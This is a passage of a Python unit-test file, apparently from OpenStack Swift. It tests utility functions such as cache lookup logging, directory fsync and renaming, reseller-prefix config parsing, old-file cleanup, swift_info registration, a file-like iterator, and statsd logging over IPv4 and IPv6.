# should never get logging when swift.cache is found
env = {'swift.cache': 42}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, False))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
# check allow_none controls logging when swift.cache is not found
err_msg = 'ERROR: swift.cache could not be found in env!'
env = {}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, False))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
def test_fsync_dir(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
fd, temppath = tempfile.mkstemp(dir=tempdir)
_mock_fsync = mock.Mock()
_mock_close = mock.Mock()
with patch('swift.common.utils.fsync', _mock_fsync):
with patch('os.close', _mock_close):
utils.fsync_dir(tempdir)
self.assertTrue(_mock_fsync.called)
self.assertTrue(_mock_close.called)
self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int))
self.assertEqual(_mock_fsync.call_args[0][0],
_mock_close.call_args[0][0])
# Not a directory - arg is file path
self.assertRaises(OSError, utils.fsync_dir, temppath)
logger = FakeLogger()
def _mock_fsync(fd):
raise OSError(errno.EBADF, os.strerror(errno.EBADF))
with patch('swift.common.utils.fsync', _mock_fsync):
with mock.patch('swift.common.utils.logging', logger):
utils.fsync_dir(tempdir)
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
finally:
if fd is not None:
os.close(fd)
os.unlink(temppath)
if tempdir:
os.rmdir(tempdir)
def test_renamer_with_fsync_dir(self):
tempdir = None
try:
tempdir = mkdtemp(dir='/tmp')
# Simulate part of object path already existing
part_dir = os.path.join(tempdir, 'objects/1234/')
os.makedirs(part_dir)
obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32)
obj_path = os.path.join(obj_dir, '1425276031.12345.data')
# Object dir had to be created
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir on parents of all newly create dirs
self.assertEqual(_m_fsync_dir.call_count, 3)
# Object dir existed
_m_os_rename.reset_mock()
_m_fsync_dir.reset_mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir only on the leaf dir
self.assertEqual(_m_fsync_dir.call_count, 1)
finally:
if tempdir:
shutil.rmtree(tempdir)
def test_renamer_when_fsync_is_false(self):
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
_m_makedirs_count = mock.Mock(return_value=2)
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
with patch('swift.common.utils.makedirs_count',
_m_makedirs_count):
utils.renamer("fake_path", "/a/b/c.data", fsync=False)
_m_makedirs_count.assert_called_once_with("/a/b")
_m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data")
self.assertFalse(_m_fsync_dir.called)
def test_makedirs_count(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
os.makedirs(os.path.join(tempdir, 'a/b'))
# 4 new dirs created
dirpath = os.path.join(tempdir, 'a/b/1/2/3/4')
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 4)
# no new dirs created - dir already exists
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 0)
# path exists and is a file
fd, temppath = tempfile.mkstemp(dir=dirpath)
os.close(fd)
self.assertRaises(OSError, utils.makedirs_count, temppath)
finally:
if tempdir:
shutil.rmtree(tempdir)
class ResellerConfReader(unittest.TestCase):
def setUp(self):
self.default_rules = {'operator_roles': ['admin', 'swiftoperator'],
'service_roles': [],
'require_group': ''}
def test_defaults(self):
conf = {}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_same_as_default(self):
conf = {'reseller_prefix': 'AUTH',
'operator_roles': 'admin, swiftoperator'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_single_blank_reseller(self):
conf = {'reseller_prefix': ''}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_single_blank_reseller_with_conf(self):
conf = {'reseller_prefix': '',
"''operator_roles": 'role1, role2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''].get('operator_roles'),
['role1', 'role2'])
self.assertEqual(options[''].get('service_roles'),
self.default_rules.get('service_roles'))
self.assertEqual(options[''].get('require_group'),
self.default_rules.get('require_group'))
def test_multiple_same_resellers(self):
conf = {'reseller_prefix': " '' , '' "}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
conf = {'reseller_prefix': '_, _'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['_'])
conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
def test_several_resellers_with_conf(self):
conf = {'reseller_prefix': 'PRE1, PRE2',
'PRE1_operator_roles': 'role1, role2',
'PRE1_service_roles': 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['PRE1_', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['PRE1_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['PRE1_'].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['PRE1_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_first_blank(self):
conf = {'reseller_prefix': " '' , PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_with_blank_comma(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_stray_comma(self):
conf = {'reseller_prefix': "AUTH ,, PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_multiple_stray_commas_resellers(self):
conf = {'reseller_prefix': ' , , ,'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_unprefixed_options(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"operator_roles": 'role1, role2',
"service_roles": 'role3, role4',
'require_group': 'auth_blank_group',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['AUTH_'].get('service_roles')))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('auth_blank_group',
options['AUTH_'].get('require_group'))
self.assertEqual('auth_blank_group', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
class TestUnlinkOlder(unittest.TestCase):
def setUp(self):
self.tempdir = mkdtemp()
self.mtime = {}
def tearDown(self):
rmtree(self.tempdir, ignore_errors=True)
def touch(self, fpath, mtime=None):
self.mtime[fpath] = mtime or time.time()
open(fpath, 'w')
@contextlib.contextmanager
def high_resolution_getmtime(self):
orig_getmtime = os.path.getmtime
def mock_getmtime(fpath):
mtime = self.mtime.get(fpath)
if mtime is None:
mtime = orig_getmtime(fpath)
return mtime
with mock.patch('os.path.getmtime', mock_getmtime):
yield
def test_unlink_older_than_path_not_exists(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_older_than(path, time.time())
def test_unlink_older_than_file(self):
path = os.path.join(self.tempdir, 'some-file')
self.touch(path)
with self.assertRaises(OSError) as ctx:
utils.unlink_older_than(path, time.time())
self.assertEqual(ctx.exception.errno, errno.ENOTDIR)
def test_unlink_older_than_now(self):
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, time.time())
self.assertEqual([], os.listdir(self.tempdir))
def test_unlink_not_old_enough(self):
start = time.time()
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, start)
self.assertEqual(['test'], os.listdir(self.tempdir))
def test_unlink_mixed(self):
self.touch(os.path.join(self.tempdir, 'first'))
cutoff = time.time()
self.touch(os.path.join(self.tempdir, 'second'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, cutoff)
self.assertEqual(['second'], os.listdir(self.tempdir))
def test_unlink_paths(self):
paths = []
for item in ('first', 'second', 'third'):
path = os.path.join(self.tempdir, item)
self.touch(path)
paths.append(path)
# don't unlink everyone
with self.high_resolution_getmtime():
utils.unlink_paths_older_than(paths[:2], time.time())
self.assertEqual(['third'], os.listdir(self.tempdir))
def test_unlink_empty_paths(self):
# just make sure it doesn't blow up
utils.unlink_paths_older_than([], time.time())
def test_unlink_not_exists_paths(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_paths_older_than([path], time.time())
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
utils.register_swift_info('goodkey', foo='5.6')
self.assertRaises(ValueError,
utils.register_swift_info, 'bad.key', foo='5.6')
data = {'bad.key': '5.6'}
self.assertRaises(ValueError,
utils.register_swift_info, 'goodkey', **data)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_get_swift_admin_info_with_disallowed_sub_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap2_foo': 'cap2_bar'},
'cap4': {'a': {'b': {'c': 'c'},
'b.c': 'b.c'}}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3',
'cap4.a.b.c'])
self.assertTrue('cap3' not in info)
self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa')
self.assertTrue('cap1_foo' not in info['cap1'])
self.assertTrue('c' not in info['cap4']['a']['b'])
self.assertEqual(info['cap4']['a']['b.c'], 'b.c')
def test_get_swift_info_with_unmatched_disallowed_sections(self):
cap1 = {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'}
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': cap1}
# expect no exceptions
info = utils.get_swift_info(
disallowed_sections=['cap2.cap1_foo', 'cap1.no_match',
'cap1.cap1_foo.no_match.no_match'])
self.assertEqual(info['cap1'], cap1)
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_next(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = next(iter_file)
except StopIteration:
break
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_read(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEqual(iter_file.read(), b''.join(in_iter))
def test_read_with_size(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEqual(b''.join(chunks), b''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEqual(utils.FileLikeIter(b'abc').read(0), b'')
def test_readline(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readline2(self):
self.assertEqual(
utils.FileLikeIter([b'abc', b'def\n']).readline(4),
b'abcd')
def test_readline3(self):
self.assertEqual(
utils.FileLikeIter([b'a' * 1111, b'bc\ndef']).readline(),
(b'a' * 1111) + b'bc\n')
def test_readline_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[b'ab', b'c\n', b'd\n', b'ef', b'g\n', b'h\n', b'ij', b'\n', b'\n',
b'k\n', b'tr', b'ai', b'li', b'ng', b'.'])
def test_readlines(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readlines_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEqual(
lists_of_lines,
[[b'ab'], [b'c\n'], [b'd\n'], [b'ef'], [b'g\n'], [b'h\n'], [b'ij'],
[b'\n', b'\n'], [b'k\n'], [b'tr'], [b'ai'], [b'li'], [b'ng'],
[b'.']])
def test_close(self):
iter_file = utils.FileLikeIter([b'a', b'b', b'c'])
self.assertEqual(next(iter_file), b'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def setUp(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('localhost', port,
# socket.AF_INET) returned once
return [(socket.AF_INET, # address family
socket.SOCK_STREAM, # socket type
socket.IPPROTO_TCP, # socket protocol
'', # canonical name,
('127.0.0.1', port)), # socket address
(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('127.0.0.1', port))]
self.real_getaddrinfo = utils.socket.getaddrinfo
self.getaddrinfo_patcher = mock.patch.object(
utils.socket, 'getaddrinfo', fake_getaddrinfo)
self.mock_getaddrinfo = self.getaddrinfo_patcher.start()
self.addCleanup(self.getaddrinfo_patcher.stop)
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertIsNone(logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assertTrue(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_ipv4_or_ipv6_hostname_defaults_to_ipv4(self):
def stub_getaddrinfo_both_ipv4_and_ipv6(host, port, family, *rest):
if family == socket.AF_INET:
return [(socket.AF_INET, 'blah', 'blah', 'blah',
('127.0.0.1', int(port)))]
elif family == socket.AF_INET6:
# Implemented so an incorrectly ordered implementation (IPv6
# then IPv4) would realistically fail.
return [(socket.AF_INET6, 'blah', 'blah', 'blah',
('::1', int(port), 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo',
new=stub_getaddrinfo_both_ipv4_and_ipv6):
logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('localhost', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv4_instantiation_and_socket_creation(self):
logger = utils.get_logger({
'log_statsd_host': '127.0.0.1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('127.0.0.1', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv6_instantiation_and_socket_creation(self):
# We have to check the given hostname or IP for IPv4/IPv6 on logger
# instantiation so we don't call getaddrinfo() too often and don't have
# to call bind() on our socket to detect IPv4/IPv6 on every send.
#
# This test uses the real getaddrinfo, so we patch over the mock to
# put the real one back. If we just stop the mock, then
# unittest.exit() blows up, but stacking real-fake-real works okay.
with mock.patch.object(utils.socket, 'getaddrinfo',
self.real_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET6)
self.assertEqual(statsd_client._target, ('::1', 9876, 0, 0))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET6)
def test_bad_hostname_instantiation(self):
with mock.patch.object(utils.socket, 'getaddrinfo',
side_effect=utils.socket.gaierror("whoops")):
logger = utils.get_logger({
'log_statsd_host': 'i-am-not-a-hostname-or-ip',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target,
('i-am-not-a-hostname-or-ip', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
# Maybe the DNS server gets fixed in a bit and it starts working... or
# maybe the DNS record hadn't propagated yet. In any case, failed
# statsd sends will warn in the logs until the DNS failure or invalid
# IP address in the configuration is fixed.
def test_sending_ipv6(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('::1', port,
# socket.AF_INET6) returned once
return [(socket.AF_INET6,
socket.SOCK_STREAM,
socket.IPPROTO_TCP,
'', ('::1', port, 0, 0)),
(socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('::1', port, 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo', fake_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket()
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
self.assertEqual(fl.get_lines_for_level('warning'), [])
self.assertEqual(mock_socket.sent,
[(b'some-name.tunafish:1|c', ('::1', 9876, 0, 0))])
def test_no_exception_when_cant_send_udp_packet(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket(sendto_errno=errno.EPERM)
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
expected = ["Error sending UDP message to ('some.host.com', 8125): "
"[Errno 1] test errno 1"]
self.assertEqual(fl.get_lines_for_level('warning'), expected)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
